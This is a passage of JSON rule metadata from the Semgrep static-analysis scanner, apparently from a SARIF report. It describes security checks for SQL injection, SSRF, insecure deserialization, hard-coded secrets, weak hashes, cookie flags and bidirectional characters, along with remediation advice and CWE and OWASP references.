[https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","id":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","name":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","id":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","name":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","id":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","name":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill","id":"python.lang.deserialization.tainted-dill.tainted-dill","name":"python.lang.deserialization.tainted-dill.tainted-dill","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-dill.tainted-dill"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","id":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","name":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","id":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","name":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mysql.express-mysql-sqli.express-mysql-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"help":{"markdown":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash)\n - [https://cwe.mitre.org/data/definitions/328.html](https://cwe.mitre.org/data/definitions/328.html)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","id":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","name":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","id":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","name":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express","id":"javascript.express.db.sequelize-express.sequelize-express","name":"javascript.express.db.sequelize-express.sequelize-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sequelize-express.sequelize-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"help":{"markdown":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf)\n - [https://www.cvedetails.com/cve/CVE-2020-28168/](https://www.cvedetails.com/cve/CVE-2020-28168/)\n - [https://owasp.org/www-community/attacks/Server_Side_Request_Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery)\n","text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"helpUri":"https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","id":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","name":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","id":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","name":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"help":{"markdown":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash)\n - [https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile](https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile)\n","text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"helpUri":"https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","id":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","name":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","id":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","name":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","id":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","name":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"help":{"markdown":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted)\n - [https://laravel.com/docs/9.x/responses#cookies-and-encryption](https://laravel.com/docs/9.x/responses#cookies-and-encryption)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management)\n","text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","id":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","name":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"help":{"markdown":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment)\n - [https://cwe.mitre.org/data/definitions/915.html](https://cwe.mitre.org/data/definitions/915.html)\n - [https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md](https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md)\n","text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment","id":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","name":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","MEDIUM CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.audit.mass-assignment.mass-assignment"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","id":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","name":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"help":{"markdown":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters)\n - [https://trojansource.codes/](https://trojansource.codes/)\n","text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"helpUri":"https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters","id":"generic.unicode.security.bidi.contains-bidirectional-characters","name":"generic.unicode.security.bidi.contains-bidirectional-characters","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: 